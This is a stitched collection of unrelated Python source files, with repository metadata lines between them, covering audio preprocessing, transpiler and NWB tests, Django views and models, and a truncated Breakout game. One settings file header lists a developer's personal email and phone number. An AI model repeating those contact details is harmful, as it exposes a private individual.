mean_pct_change, 'std_pct_change', std_pct_change)
return at_steady_state
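The convergence test in `check_steady_state` boils down to a symmetric relative-difference criterion. A minimal, self-contained sketch (`pct_change` is a hypothetical helper name used only for this illustration):

```python
import numpy as np

# Symmetric relative difference used above: |a - b| / |a + b|,
# compared against a 1% threshold.
def pct_change(a, b):
    return np.abs(a - b) / np.abs(a + b)

THRESH = 0.01

# A flat relief history converges immediately ...
assert pct_change(100.0, 100.0) < THRESH
# ... while a 10% jump in relief does not.
assert pct_change(100.0, 110.0) >= THRESH
```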
def get_divide_position(grid):
z = grid.at_node['topographic__elevation'].reshape(grid.shape)
z_row_mean = z.mean(axis=1)
divide_y_coord = z_row_mean.argmax() * grid.dy
return divide_y_coord
bb565d6a848c25f10f712bae53673495afeccc03 | 4,865 | py | Python | src/preprocessing.py | jimmystique/AudioClassification | 9f9966306068cff7419f6c190752bab4d35b3870 | ["MIT"]
import os
import pandas as pd
import pickle as pkl
import numpy as np
import argparse
import yaml
import librosa
import scipy
from scipy.io import wavfile
import multiprocessing
import time
import datetime
import socket
def resample_wav_data(wav_data, orig_sr, target_sr):
    """Resample wav_data from sampling rate orig_sr to target_sr.

    Note: scipy.signal.resample takes the target number of samples, not a
    sampling rate, as its second argument.
    """
# resampled_wav_data = librosa.core.resample(y=wav_data.astype(np.float32), orig_sr=orig_sr, target_sr=target_sr)
resampled_wav_data = scipy.signal.resample(wav_data, target_sr)
# print(wav_data, resampled_wav_data, len(resampled_wav_data))
return resampled_wav_data
def pad_wav_data(wav_data, vect_size):
    """Zero-pad wav_data to length vect_size, placing it at a random offset.
    """
if (len(wav_data) > vect_size):
        raise ValueError("wav_data is longer than vect_size")
elif len(wav_data) < vect_size:
padded_wav_data = np.zeros(vect_size)
starting_point = np.random.randint(low=0, high=vect_size-len(wav_data))
padded_wav_data[starting_point:starting_point+len(wav_data)] = wav_data
else:
padded_wav_data = wav_data
return padded_wav_data
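The zero-padding step can be sanity-checked with a tiny standalone mirror of the function (a hedged sketch under the same numpy-only assumptions, not the module's own code):

```python
import numpy as np

# Standalone mirror of pad_wav_data: embed a short signal at a random
# offset inside a zero vector of length vect_size.
def pad_to_length(wav_data, vect_size):
    if len(wav_data) > vect_size:
        raise ValueError("wav_data is longer than vect_size")
    if len(wav_data) == vect_size:
        return wav_data
    padded = np.zeros(vect_size)
    start = np.random.randint(low=0, high=vect_size - len(wav_data))
    padded[start:start + len(wav_data)] = wav_data
    return padded

np.random.seed(42)  # same seed the script sets in __main__
out = pad_to_length(np.ones(5), 16)
assert out.shape == (16,) and out.sum() == 5.0
```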
def fft_preprocess_user_data_at_pth(user_data_path, preprocessed_data_path, vect_size):
print(user_data_path)
user_df = pd.DataFrame(columns=['data', "user_id", "record_num", "label"])
wav_user_id = 0
for file in sorted(os.listdir(user_data_path)):
if file.endswith(".wav"):
wav_label, wav_user_id, wav_record_n = os.path.splitext(file)[0].split("_")
wav_sr, wav_data = wavfile.read(os.path.join(user_data_path, file))
resampled_wav_data = resample_wav_data(wav_data, wav_sr, vect_size)
# new_row = {"data": padded_wav_data, "user_id": wav_user_id, "record_num": wav_record_n, "label": wav_label}
new_row = {"data": resampled_wav_data, "user_id": wav_user_id, "record_num": wav_record_n, "label": wav_label}
user_df = user_df.append(new_row, ignore_index=True)
pkl.dump( user_df, open("{}_preprocessed.pkl".format(os.path.join(preprocessed_data_path, str(wav_user_id))), "wb" ) )
def downsampling_preprocess_user_data_at_pth(user_data_path, preprocessed_data_path, target_sr, vect_size):
print(user_data_path)
user_df = pd.DataFrame(columns=['data', "user_id", "record_num", "label"])
wav_user_id = 0
for file in sorted(os.listdir(user_data_path)):
if file.endswith(".wav"):
wav_label, wav_user_id, wav_record_n = os.path.splitext(file)[0].split("_")
wav_sr, wav_data = wavfile.read(os.path.join(user_data_path, file))
y,s = librosa.load(os.path.join(user_data_path, file), target_sr)
padded_wav_data = pad_wav_data(y, vect_size)
new_row = {"data": padded_wav_data, "user_id": wav_user_id, "record_num": wav_record_n, "label": wav_label}
user_df = user_df.append(new_row, ignore_index=True)
pkl.dump(user_df, open("{}_preprocessed.pkl".format(os.path.join(preprocessed_data_path, str(wav_user_id))), "wb" ) )
def preprocess(raw_data_path, preprocessed_data_path, resampling_method, n_process, vect_size, target_sr=8000,):
#Create preprocessed_data_path if the directory does not exist
if not os.path.exists(preprocessed_data_path):
os.makedirs(preprocessed_data_path)
users_data_path = sorted([folder.path for folder in os.scandir(raw_data_path) if folder.is_dir() and any(file.endswith(".wav") for file in os.listdir(folder))])
print(users_data_path)
# pool=multiprocessing.Pool(n_process)
pool=multiprocessing.Pool(1)
if resampling_method == 'fft':
print("Resampling with FFT ...")
pool.starmap(fft_preprocess_user_data_at_pth, [[folder, preprocessed_data_path, vect_size] for folder in users_data_path if os.path.isdir(folder)], chunksize=1)
elif resampling_method == 'downsampling':
print("Resampling by downsampling ...")
pool.starmap(downsampling_preprocess_user_data_at_pth, [[folder, preprocessed_data_path, target_sr, vect_size] for folder in users_data_path if os.path.isdir(folder)], chunksize=1)
else:
        raise ValueError(f"resampling method {resampling_method!r} does not exist")
if __name__ == "__main__":
np.random.seed(42)
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--preprocessing_cfg", default="configs/config.yaml", type=str, help = "Path to the configuration file")
args = parser.parse_args()
preprocessing_cfg = yaml.safe_load(open(args.preprocessing_cfg))["preprocessing"]
t1 = time.time()
preprocess(**preprocessing_cfg)
t2 = time.time()
with open("logs/logs.csv", "a") as myfile:
myfile.write("{:%Y-%m-%d %H:%M:%S},data preprocessing,{},{},{:.2f}\n".format(datetime.datetime.now(),socket.gethostname(),preprocessing_cfg['n_process'],t2-t1))
print("Time elapsed for data processing: {} seconds ".format(t2-t1))
#Preprocessing : ~113s using Parallel computing with n_processed = 10 and resampling with scipys
#Preprocessing : ~477.1873028278351 seconds using Parallel computing with n_processed = 10 and resampling with resampy (python module for efficient time-series resampling)
bb5669ae64601c0a6365ad7e4ed02e95b6e730f0 | 506 | py | Python | tests/builtins/test_dir.py | VeliborKrivokuca/batavia | ecbdc21dc7e002415e6c0ea8654d2b8a8c7a85fa | ["BSD-3-Clause"] | 1,256 stars | 406 issues | 589 forks
from ..utils import TranspileTestCase, BuiltinFunctionTestCase
class DirTests(TranspileTestCase):
pass
class BuiltinDirFunctionTests(BuiltinFunctionTestCase, TranspileTestCase):
function = "dir"
not_implemented = [
'test_class',
]
class BuiltinDirTypeFunctionTests(BuiltinFunctionTestCase, TranspileTestCase):
"""Test suite that ensures that dir(x) returns the correct type."""
function = "lambda x: type(dir(x))"
not_implemented = [
'test_class',
]
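For reference, the behavior the type-checking suite above pins down can be observed directly in plain CPython (a hedged illustration, independent of Batavia's transpiler):

```python
# dir() always returns a plain, sorted list of attribute names,
# so type(dir(x)) should be `list` for any object.
wrapped = lambda x: type(dir(x))

assert wrapped(42) is list
assert wrapped("abc") is list
assert dir(1) == sorted(dir(1))
```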
bb574f490a6c4afce6122ec48aebabf0148da56e | 3,999 | py | Python | threemegawatt/threemegawatt/settings/development.py | opemipoVRB/MeterTracker | 3c52e704844628db31b72d008983b6c090266775 | ["MIT"]
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←
←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←
↓↓...........................................................................↓↓
↓↓..........................↓↓↓↓↓↓↓↓↓↓↓↓↓....................................↓↓
↓↓.......................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓.................................↓↓
↓↓.....................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓...............................↓↓
↓↓....................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓..............................↓↓
↓↓...................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓.↓↓...............................↓↓
↓↓...................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓...↓↓..............................↓↓
↓↓...................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓.↓↓...↓↓↓.............................↓↓
↓↓...................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓..............................↓↓
↓↓....................↓↓↓↓↓↓↓↓↓↓↓↓↓.....↓↓↓↓↓↓↓↓↓............................↓↓
↓↓......................↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓..↓↓↓↓↓↓↓............................↓↓
↓↓...................................↓↓↓.....................................↓↓
↓↓.................↓↓................↓↓↓↓ ↓↓↓↓↓↓↓........↓...................↓↓
↓↓...............↓↓↓↓↓↓..............↓↓↓↓↓↓↓↓↓↓↓↓↓...↓↓↓↓↓↓..................↓↓
↓↓............↓↓↓↓..↓↓↓↓↓.........................↓↓↓↓↓↓↓↓↓..................↓↓
↓↓............↓↓↓↓...↓↓↓↓↓↓↓....................↓↓↓↓↓↓.↓↓.↓↓.................↓↓
↓↓...............↓↓↓↓↓↓↓↓↓↓↓↓↓↓............↓↓↓↓↓↓↓↓..........................↓↓
↓↓.........................↓↓↓↓↓↓↓↓↓...↓↓↓↓↓↓↓...............................↓↓
↓↓..............................↓↓↓↓↓↓↓↓↓↓...................................↓↓
↓↓..........................↓↓↓↓↓....↓↓↓↓↓↓↓↓↓...............................↓↓
↓↓............↓↓.↓↓↓↓↓↓↓↓↓↓↓↓↓............↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓..................↓↓
↓↓............↓↓.↓↓..↓↓↓↓.....................↓↓↓↓↓↓↓↓↓↓↓↓↓↓.................↓↓
↓↓..............↓↓↓↓↓↓............................↓↓.↓↓↓↓↓↓↓.................↓↓
↓↓.................. ......................↓↓
↓↓.................. ↑↑↑ ↑↑↑ ↑↑↑↑↑↑↑ ↑↑↑↑↑↑↑ .......................↓↓
↓↓.................. ↑↑↑ ↑↑↑ ↑↑↑ ↑↑↑↑ ↑↑↑ ↑↑↑↑.....................↓↓
↓↓.................. ↑↑↨ ↑↑↑ ↑↑↨ ↨↑↑ ↑↑↨ ↨↑↑......................↓↓
↓↓.................. ↨↑↨ ↑↨↑ ↨↑↨ ↨↑↨ ↨↑↨ ↨↑↨......................↓↓
↓↓.................. ↑↨↑ ↨↑↨ ↨↨↑↨↑↨↨↑↑↨ ↨↨↑↨↑↨↨↑↑↨.....................↓↓
↓↓.................. ↨↑↨ ↨↨↨ ↨↨↨ ↨↨↨ ↨↨↨ ↨↨↨....................↓↓
↓↓.................. :↨: ↨↨: ↨↨: :↨↨ ↨↨: :::....................↓↓
↓↓................... ::↨↨:↨ :↨: :↨: :↨: :::....................↓↓
↓↓.................... :::: ::: ::: ::: :::....................↓↓
↓↓...................... : : : ::::::: ....................↓↓
↓↓...........................................................................↓↓
↓↓←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←↓↓
↓↓→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→↓↓
↓↓ development.py.py Created by Durodola Opemipo 2019 ↓↓
↓↓ Personal Email : <opemipodurodola@gmail.com> ↓↓
↓↓ Telephone Number: +2348182104309 ↓↓
↓↓→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→→↓↓
↓↓←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←↓↓
"""
import os
from threemegawatt.settings.base import *
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env("DEBUG")
ALLOWED_HOSTS = ['localhost', '127.0.0.1']
bb59b961461cedfb2ddeb8299bd41e4af9504caf | 5,260 | py | Python | {{ cookiecutter.namespace }}/src/pynwb/tests/test_tetrodeseries.py | TheChymera/ndx-template | 44ee210181d5770d037106acff345fe1d30e0477 | ["BSD-3-Clause-LBNL"] | 3 stars | 38 issues | 4 forks
import datetime
import numpy as np
from pynwb import NWBHDF5IO, NWBFile
from pynwb.core import DynamicTableRegion
from pynwb.device import Device
from pynwb.ecephys import ElectrodeGroup
from pynwb.file import ElectrodeTable as get_electrode_table
from pynwb.testing import TestCase, remove_test_file, AcquisitionH5IOMixin
from {{ cookiecutter.py_pkg_name }} import TetrodeSeries
def set_up_nwbfile():
nwbfile = NWBFile(
session_description='session_description',
identifier='identifier',
session_start_time=datetime.datetime.now(datetime.timezone.utc)
)
device = nwbfile.create_device(
name='device_name'
)
electrode_group = nwbfile.create_electrode_group(
name='electrode_group',
description='description',
location='location',
device=device
)
for i in np.arange(10.):
nwbfile.add_electrode(
x=i,
y=i,
z=i,
imp=np.nan,
location='location',
filtering='filtering',
group=electrode_group
)
return nwbfile
class TestTetrodeSeriesConstructor(TestCase):
def setUp(self):
"""Set up an NWB file. Necessary because TetrodeSeries requires references to electrodes."""
self.nwbfile = set_up_nwbfile()
def test_constructor(self):
"""Test that the constructor for TetrodeSeries sets values as expected."""
all_electrodes = self.nwbfile.create_electrode_table_region(
region=list(range(0, 10)),
description='all the electrodes'
)
data = np.random.rand(100, 3)
tetrode_series = TetrodeSeries(
name='name',
description='description',
data=data,
rate=1000.,
electrodes=all_electrodes,
trode_id=1
)
self.assertEqual(tetrode_series.name, 'name')
self.assertEqual(tetrode_series.description, 'description')
np.testing.assert_array_equal(tetrode_series.data, data)
self.assertEqual(tetrode_series.rate, 1000.)
self.assertEqual(tetrode_series.starting_time, 0)
self.assertEqual(tetrode_series.electrodes, all_electrodes)
self.assertEqual(tetrode_series.trode_id, 1)
class TestTetrodeSeriesRoundtrip(TestCase):
"""Simple roundtrip test for TetrodeSeries."""
def setUp(self):
self.nwbfile = set_up_nwbfile()
self.path = 'test.nwb'
def tearDown(self):
remove_test_file(self.path)
def test_roundtrip(self):
"""
Add a TetrodeSeries to an NWBFile, write it to file, read the file, and test that the TetrodeSeries from the
file matches the original TetrodeSeries.
"""
all_electrodes = self.nwbfile.create_electrode_table_region(
region=list(range(0, 10)),
description='all the electrodes'
)
data = np.random.rand(100, 3)
tetrode_series = TetrodeSeries(
name='TetrodeSeries',
description='description',
data=data,
rate=1000.,
electrodes=all_electrodes,
trode_id=1
)
self.nwbfile.add_acquisition(tetrode_series)
with NWBHDF5IO(self.path, mode='w') as io:
io.write(self.nwbfile)
with NWBHDF5IO(self.path, mode='r', load_namespaces=True) as io:
read_nwbfile = io.read()
self.assertContainerEqual(tetrode_series, read_nwbfile.acquisition['TetrodeSeries'])
class TestTetrodeSeriesRoundtripPyNWB(AcquisitionH5IOMixin, TestCase):
"""Complex, more complete roundtrip test for TetrodeSeries using pynwb.testing infrastructure."""
def setUpContainer(self):
""" Return the test TetrodeSeries to read/write """
self.device = Device(
name='device_name'
)
self.group = ElectrodeGroup(
name='electrode_group',
description='description',
location='location',
device=self.device
)
self.table = get_electrode_table() # manually create a table of electrodes
for i in range(10):
self.table.add_row(
x=i,
y=i,
z=i,
imp=np.nan,
location='location',
filtering='filtering',
group=self.group,
group_name='electrode_group'
)
all_electrodes = DynamicTableRegion(
data=list(range(0, 10)),
description='all the electrodes',
name='electrodes',
table=self.table
)
data = np.random.rand(100, 3)
tetrode_series = TetrodeSeries(
name='name',
description='description',
data=data,
rate=1000.,
electrodes=all_electrodes,
trode_id=1
)
return tetrode_series
def addContainer(self, nwbfile):
"""Add the test TetrodeSeries and related objects to the given NWBFile."""
nwbfile.add_device(self.device)
nwbfile.add_electrode_group(self.group)
nwbfile.set_electrode_table(self.table)
nwbfile.add_acquisition(self.container)
bb5b9e701abf5095d0390b5cf553b81d80794a1b | 5,113 | py | Python | calaccess_website/views/docs/ccdc.py | california-civic-data-coalition/django-calaccess-downloads | 198f3b5b7fca846d9ce7c84f3a5bfa0ff4d3d3f7 | ["MIT"] | 3 stars | 193 issues | 4 forks
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Views for CCDC file documentation pages.
"""
# Django tricks
from django.apps import apps
from django.http import Http404
from django.urls import reverse
from calaccess_website.templatetags.calaccess_website_tags import slugify
# Models
from calaccess_processed.models import ProcessedDataFile
# Views
from calaccess_website.views import CalAccessModelListMixin
from django.views.generic import DetailView, ListView
def get_ocd_proxy_models():
"""
Return an iterable of all OCD proxy models from the processed_data app.
"""
election_proxies = apps.get_app_config('calaccess_processed_elections').get_ocd_models_map().values()
flat_proxies = apps.get_app_config("calaccess_processed_flatfiles").get_flat_proxy_list()
return list(election_proxies) + list(flat_proxies)
def get_processed_data_files():
"""
Return a tuple of ProcessedDataFile instances for published files.
"""
file_list = [ProcessedDataFile(file_name=m().file_name) for m in get_ocd_proxy_models()]
return sorted(file_list, key=lambda f: f.file_name)
class CcdcFileList(ListView, CalAccessModelListMixin):
template_name = 'calaccess_website/docs/ccdc/file_list.html'
def get_queryset(self):
"""
Returns the CCDC model list with grouped by type.
"""
return self.regroup_by_klass_group(get_processed_data_files())
def get_context_data(self, **kwargs):
context = super(CcdcFileList, self).get_context_data(**kwargs)
context['file_num'] = len(get_processed_data_files())
context['title'] = 'Processed files'
context['description'] = 'Definitions, record layouts and data dictionaries for the \
processed data files released by the California Civic Data Coalition. Recommended for beginners and regular use.'
return context
class BaseFileDetailView(DetailView):
"""
Base class for views providing information about a CCDC data file.
"""
def get_queryset(self):
"""
Returns a list of the ccdc data files as a key dictionary
with the URL slug as the keys.
"""
return dict((slugify(f.file_name), f) for f in get_processed_data_files())
def set_kwargs(self, obj):
self.kwargs = {
'slug': obj
}
def get_object(self):
"""
Returns the file model from the CAL-ACCESS processed data app that
matches the provided slug.
    Raises a 404 error if one is not found.
"""
key = self.kwargs['slug']
try:
return self.get_queryset()[key.lower()]
except KeyError:
raise Http404
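The slug-keyed lookup in `get_object` reduces to a dictionary fetch with a case-folded key. A framework-free sketch (the `NotFound` class and file names below are hypothetical stand-ins for `Http404` and the real queryset):

```python
class NotFound(Exception):
    """Stand-in for django.http.Http404 in this sketch."""

files = {"elections": "elections.csv", "candidates": "candidates.csv"}

def get_object(slug):
    # Mirror of BaseFileDetailView.get_object: lower-case the slug and
    # translate a missing key into a 404-style error.
    try:
        return files[slug.lower()]
    except KeyError:
        raise NotFound(slug)

assert get_object("Elections") == "elections.csv"
```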
def get_context_data(self, **kwargs):
"""
Add some extra bits to the template's context
"""
file_name = self.kwargs['slug'].replace("-", "")
context = super(BaseFileDetailView, self).get_context_data(**kwargs)
# Pull all previous versions of the provided file
context['version_list'] = ProcessedDataFile.objects.filter(
file_name__icontains=file_name
).order_by(
'-version__raw_version__release_datetime'
).exclude(
version__raw_version__release_datetime__lte='2016-07-27'
)
# note if the most recent version of the file is empty
try:
context['empty'] = context['version_list'][0].records_count == 0
except IndexError:
context['empty'] = True
return context
class CcdcFileDownloadsList(BaseFileDetailView):
"""
A detail page with links to all downloads for the provided CCDC data file.
"""
template_name = 'calaccess_website/docs/ccdc/download_list.html'
def get_url(self, obj):
return reverse('ccdc_file_downloads_list', kwargs=dict(slug=obj))
class CcdcFileDetail(BaseFileDetailView):
"""
A detail page with all documentation for the provided CCDC data file.
"""
template_name = 'calaccess_website/docs/ccdc/file_detail.html'
def get_url(self, obj):
return reverse('ccdc_file_detail', kwargs=dict(slug=obj))
def get_context_data(self, **kwargs):
"""
Add some extra bits to the template's context
"""
context = super(CcdcFileDetail, self).get_context_data(**kwargs)
# Add list of fields to context
context['fields'] = self.get_sorted_fields()
return context
def get_sorted_fields(self):
"""
Return a list of fields (dicts) sorted by name.
"""
field_list = []
for field in self.object.model().get_field_list():
field_data = {
'column': field.name,
'description': field.description,
'help_text': field.help_text,
}
if field.choices and len(field.choices) > 0:
field_data['choices'] = [c for c in field.choices]
else:
field_data['choices'] = None
field_list.append(field_data)
return sorted(field_list, key=lambda k: k['column'])
bb5c8ea17ee9ecb16f8a2b9c72c06dd3eb1f5f67 | 2,536 | py | Python | comment/models/reactions.py | setayeshmbr/coronavirus_blog | 2bb94e905ac7e5401776ac81fd301a90a24f1a9f | ["MIT"]
from enum import IntEnum, unique
from django.contrib.auth import get_user_model
from django.db import models
from django.db.models.signals import post_delete, post_save
from django.dispatch import receiver
from django.utils import timezone
from comment.models import Comment
from comment.managers import ReactionManager, ReactionInstanceManager
class Reaction(models.Model):
comment = models.OneToOneField(Comment, on_delete=models.CASCADE)
likes = models.PositiveIntegerField(default=0)
dislikes = models.PositiveIntegerField(default=0)
objects = ReactionManager()
def _increase_count(self, field):
self.refresh_from_db()
setattr(self, field, models.F(field) + 1)
self.save(update_fields=[field])
def _decrease_count(self, field):
self.refresh_from_db()
setattr(self, field, models.F(field) - 1)
self.save(update_fields=[field])
def increase_reaction_count(self, reaction):
if reaction == ReactionInstance.ReactionType.LIKE.value:
self._increase_count('likes')
else:
self._increase_count('dislikes')
def decrease_reaction_count(self, reaction):
if reaction == ReactionInstance.ReactionType.LIKE.value:
self._decrease_count('likes')
else:
self._decrease_count('dislikes')
class ReactionInstance(models.Model):
@unique
class ReactionType(IntEnum):
LIKE = 1
DISLIKE = 2
CHOICES = [(r.value, r.name) for r in ReactionType]
reaction = models.ForeignKey(Reaction, related_name='reactions', on_delete=models.CASCADE)
user = models.ForeignKey(get_user_model(), related_name='reactions', on_delete=models.CASCADE)
reaction_type = models.SmallIntegerField(choices=CHOICES)
    # `auto_now` expects a boolean, not a datetime; use a callable default.
    date_reacted = models.DateTimeField(default=timezone.now)
objects = ReactionInstanceManager()
class Meta:
unique_together = ['user', 'reaction']
@receiver(post_delete, sender=ReactionInstance)
def delete_reaction_instance(sender, instance, using, **kwargs):
instance.reaction.decrease_reaction_count(instance.reaction_type)
@receiver(post_save, sender=ReactionInstance)
def add_count(sender, instance, created, raw, using, update_fields, **kwargs):
if created:
instance.reaction.increase_reaction_count(instance.reaction_type)
@receiver(post_save, sender=Comment)
def add_reaction(sender, instance, created, raw, using, update_fields, **kwargs):
if created:
Reaction.objects.create(comment=instance)
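The `CHOICES` construction in `ReactionInstance` depends only on the standard library and can be verified in isolation (a hedged sketch whose names mirror the model):

```python
from enum import IntEnum, unique

@unique
class ReactionType(IntEnum):
    LIKE = 1
    DISLIKE = 2

# Same comprehension the model uses to build Django choices tuples.
CHOICES = [(r.value, r.name) for r in ReactionType]
assert CHOICES == [(1, "LIKE"), (2, "DISLIKE")]
```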
246de88d2fe441aebedc83fc4f8b906aee07ae8a | 1,394 | py | Python | gorp/test/test_b_option.py | molsonkiko/gorpy | 1dceb8bb530a7c7c558d51cedbbbf1cdc9e6f914 | ["MIT"]
from gorp.readfiles import *
from gorp.test.test_ku_options import setup_tempdir
import itertools
import unittest

og_dirname = os.getcwd()


def get_combos():
    setup_tempdir()
    os.chdir(os.path.join(gorpdir, "test", "temp"))
    base_query = " -b '[bp]l[uo]t' /."
    gorptags = ["-r", "-l", "-h", "-i", "-c", "-o", "-n", "-v"]
    tag_combos = (
        c
        for combos in (itertools.combinations(gorptags, ii) for ii in range(9))
        for c in combos
    )
    query_results = {}
    bad_combos = {}
    session = GorpSession(print_output=False)
    try:
        for combo in tag_combos:
            Combo = " ".join(combo)
            try:
                session.receive_query(Combo + base_query)
                out = session.old_queries["prev"].resultset
                query_results[frozenset(re.findall("[a-z]+", Combo))] = out
            except Exception as ex:
                bad_combos[frozenset(re.findall("[a-z]+", Combo))] = repr(ex)
    finally:
        session.close()
        os.chdir(og_dirname)
    return query_results, bad_combos


class BOptionTester(unittest.TestCase):
    def test_b_option(self):
        query_results, bad_combos = get_combos()
        self.assertFalse(
            bad_combos,
            "At least one option combo failed with the 'b' option under normal conditions",
        )


if __name__ == "__main__":
    unittest.main()
# File: api/__init__.py (repo: jbrownrs/issue-376-GDS-link, license: MIT)
"""
Implement a REST-ful API interface.
"""
# File: stancode_projects/Break out games/breakoutgraphics.py (repo: itinghuang/iting-projects, license: MIT)
"""
stanCode Breakout Project
Adapted from Eric Roberts's Breakout by
Sonja Johnson-Yu, Kylie Jue, Nick Bowman,
and Jerry Liao
YOUR DESCRIPTION HERE
"""
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GOval, GRect, GLabel
from campy.gui.events.mouse import onmouseclicked, onmousemoved
import random
# constant
BRICK_SPACING = 5 # Space between bricks (in pixels). This space is used for horizontal and vertical spacing.
BRICK_WIDTH = 40 # Height of a brick (in pixels).
BRICK_HEIGHT = 15 # Height of a brick (in pixels).
BRICK_ROWS = 10 # Number of rows of bricks.
BRICK_COLS = 10 # Number of columns of bricks.
BRICK_OFFSET = 50 # Vertical offset of the topmost brick from the window top (in pixels).
BALL_RADIUS = 10 # Radius of the ball (in pixels).
PADDLE_WIDTH = 75 # Width of the paddle (in pixels).
PADDLE_HEIGHT = 15 # Height of the paddle (in pixels).
PADDLE_OFFSET = 50 # Vertical offset of the paddle from the window bottom (in pixels).
# constants that cannot be changed by user
INITIAL_Y_SPEED = 7.0 # Initial vertical speed for the ball.
MAX_X_SPEED = 5 # Maximum initial horizontal speed for the ball.
count = 0 # the Qty of removed bricks
class BreakoutGraphics:

    def __init__(self, ball_radius=BALL_RADIUS, paddle_width=PADDLE_WIDTH,
                 paddle_height=PADDLE_HEIGHT, paddle_offset=PADDLE_OFFSET,
                 brick_rows=BRICK_ROWS, brick_cols=BRICK_COLS,
                 brick_width=BRICK_WIDTH, brick_height=BRICK_HEIGHT,
                 brick_offset=BRICK_OFFSET, brick_spacing=BRICK_SPACING,
                 title='Breakout'):
        # Create a graphical window, with some extra space.
        window_width = brick_cols * (brick_width + brick_spacing) - brick_spacing
        window_height = brick_offset + 3 * (brick_rows * (brick_height + brick_spacing) - brick_spacing)
        self.window = GWindow(width=window_width, height=window_height, title=title)
        # Create a paddle.
        self.paddle = GRect(PADDLE_WIDTH, PADDLE_HEIGHT, x=(window_width/2-PADDLE_WIDTH/2), y=window_height-PADDLE_OFFSET)
        self.paddle.filled = True
        self.window.add(self.paddle)
        # Center a filled ball in the graphical window.
        self.ball = GOval(BALL_RADIUS*2, BALL_RADIUS*2)
        self.ball.filled = True
        self.window.add(self.ball, x=(window_width/2-BALL_RADIUS), y=window_height/2-PADDLE_OFFSET)
        # Initialize our mouse listeners.
        onmouseclicked(self.ball_start)
        onmousemoved(self.paddle_move)
        # Default initial velocity for the ball.
        self.__dx = 0
        self.__dy = 0
        # Default the removed bricks
        self.count = 0
        # Draw bricks.
        for j in range(BRICK_ROWS):
            for i in range(BRICK_COLS):
                self.brick = GRect(BRICK_WIDTH, BRICK_HEIGHT, x=(BRICK_WIDTH+brick_spacing)*i, y=BRICK_OFFSET+(BRICK_HEIGHT+brick_spacing)*j)
                self.brick.filled = True
                if j == 0:
                    self.brick_color = 'red'
                elif j == 2:
                    self.brick_color = 'orange'
                elif j == 4:
                    self.brick_color = 'yellow'
                elif j == 6:
                    self.brick_color = 'green'
                elif j == 8:
                    self.brick_color = 'blue'
                self.brick.fill_color = self.brick_color
                self.brick.color = self.brick_color
                self.window.add(self.brick)

    def paddle_move(self, event):
        '''
        Move the paddle so that it follows the position of the mouse.
        :return: the x of paddle
        '''
        self.paddle.y = self.window.height - PADDLE_OFFSET
        if event.x <= 0:
            self.paddle.x = 0
        elif event.x >= (self.window.width - self.paddle.width):
            self.paddle.x = self.window.width - self.paddle.width
        else:
            self.paddle.x = event.x

    def ball_start(self, event):
        '''
        If the user clicks the mouse, set the velocity (__dx, __dy) and start the movement.
        :return: new __dx, __dy
        '''
        if self.__dx == 0 and self.__dy == 0:
            self.__dy = INITIAL_Y_SPEED
            self.__dx = random.randint(1, MAX_X_SPEED)
            if random.random() > 0.5:
                self.__dx = -self.__dx
            if random.random() > 0.5:
                self.__dy = -self.__dy

    def window_border(self):
        '''
        If the ball moves out of the window, the ball bounces.
        :return: new __dx, __dy
        '''
        if self.ball.x <= 0 or self.ball.x >= (self.window.width - BALL_RADIUS*2):
            self.__dx = -self.__dx
        elif self.ball.y <= 0:
            self.__dy = -self.__dy

    def move_to_bottom(self):
        '''
        If the ball touched the bottom
        :return: boolean (True/False)
        '''
        if self.ball.y >= (self.window.height - BALL_RADIUS*2):
            return True

    def back_to_start(self):
        '''
        The ball moves back to the start point to restart the game.
        :return: ball.x, ball.y, __dx, __dy
        '''
        self.ball.x = self.window.width/2 - BALL_RADIUS
        self.ball.y = self.window.height/2 - BALL_RADIUS
        self.__dx = 0
        self.__dy = 0

    def bounce_ball(self):
        '''
        If the ball hits the paddle, the ball bounces.
        :return: new __dy
        '''
        x = self.ball.x
        y = self.ball.y
        obj = self.window.get_object_at(x, y)
        obj2 = self.window.get_object_at(x + 2*BALL_RADIUS, y)
        obj3 = self.window.get_object_at(x, y + 2*BALL_RADIUS)
        obj4 = self.window.get_object_at(x + 2*BALL_RADIUS, y + 2*BALL_RADIUS)
        if obj3 == self.paddle:
            self.__dy = -self.__dy
        elif obj4 == self.paddle:
            self.__dy = -self.__dy
        elif obj == self.paddle:
            self.__dy = -self.__dy
        elif obj2 == self.paddle:
            self.__dy = -self.__dy

    def hit_brick(self):
        '''
        If the ball hits a brick, the ball bounces and the brick is removed.
        :return: count, __dy, removed bricks
        '''
        obj4 = self.window.get_object_at(self.ball.x, self.ball.y)
